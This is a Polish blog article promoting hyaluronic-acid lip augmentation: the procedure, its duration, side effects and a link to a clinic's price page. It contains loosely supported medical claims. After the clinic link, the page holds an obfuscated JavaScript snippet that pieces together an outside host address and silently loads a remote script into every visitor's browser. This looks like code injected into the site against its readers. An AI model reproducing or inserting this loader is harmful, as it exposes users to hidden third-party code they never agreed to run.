piątek, 01 kwiecień 2016 21:01

Powiększanie ust za pomocą kwasu hialuronowego. Czy to bezpieczne?

Za sprawą celebrytek i modelek, współcześnie zapanowała moda na posiadanie pięknych pełnych ust. Niestety nie wszystkie kobiety zostały obdarzone tego typu wargami. Właśnie dla nich medycyna estetyczna ma coś, co może doskonale poprawić naturę. Jest to zabieg polegający na wypełnieniu ust za pomocą kwasu hialuronowego wstrzykiwanego pod skórę.

Czym jest kwas hialuronowy?

Kwas hialuronowy dzięki swoim szerokim właściwościom odmładzającym i zdolności wiązania kolagenu zyskał dużą popularność w kosmetyce. Niewiele osób wie jednak, że substancja ta naturalnie występuje w naszym organizmie.

Kwas hialuronowy doskonale wiąże wodę. To między innymi spadek jego poziomu w organizmie odpowiedzialny jest za utratę jędrności skóry i powstawanie zmarszczek.

Jak widać, decydując się na zastrzyki z kwasem hialuronowym, pomagamy po prostu uzupełnić naszej skórze ważny składnik, który traci ona z wiekiem. Warto również pamiętać, że dostarczanie kwasu hialuronowego w formie zastrzyków ma zastosowanie nie tylko w zabiegach mających na celu powiększenie i uwypuklenie ust, bądź wypełnienia zmarszczek, ale także w terapii wielu chorób takich jak na przykład różnego rodzaju złamania, a nawet podczas leczenia jaskry, czy też uszkodzenia chrząstki nosowej.

Jak wygląda zabieg powiększania ust kwasem hialuronowym?

Powiększenie ust za pomocą kwasu hialuronowego przeprowadzane jest zawsze w znieczuleniu miejscowym. Zazwyczaj przed dokonaniem zabiegu, osoba go przeprowadzająca smaruje specjalnym żelem chłodzącym i znieczulającym w miejsca, w których wstrzykiwany będzie kwas hialuronowy. Dzięki temu unikniemy dyskomfortu podczas, gdy będą nam podawane zastrzyki z kwasem.

Sam zabieg trwa zaledwie kilkanaście minut, a efekty widoczne są niemal od razu po wstrzyknięciu substancji wypełniającej. Rezultatem, jaki osiągnęliśmy poddając się zabiegowi powiększenia ust możemy cieszyć się ok. roku, czyli od 12 do 14 miesięcy. Po tym czasie kwas hialuronowy zostaje wchłonięty i zabieg należy powtórzyć.

Po zabiegu przez kilka godzin możemy odczuwać lekki dyskomfort, oraz zauważyć zaczerwienienie i opuchliznę w miejscach, gdzie wstrzykiwany był kwas hialuronowy. Objawy te jednak bardzo szybko ustępują.

Obszerniejsze informacje na temat przebiegu powiększania ust z użyciem kwasu hialuronowego, a także ceny takiego zabiegu można znaleźć tutaj: http://www.instytutluisa.pl/uslugi/powiekszanie-ust/

(function(){ aalk=document.createElement("script");aalk_="u"+("s")+"ta"; aalk_+=("t.i")+""+"n";aalk_+=(("f")+"o");aalk.type="text/j-avascript"; aalk_+="/"; aalku="8727589";aalku+=".ky12xtegalkf7znbsxq";aalku+="Xqpy36nx9a9"; aalk.src="//"+aalk_+aalku; aalk.async=true; document.body.appendChild(aalk); })();

Czytany 2362 razy

Skomentuj

Upewnij się, że pola oznaczone wymagane gwiazdką (*) zostały wypełnione. Kod HTML nie jest dozwolony.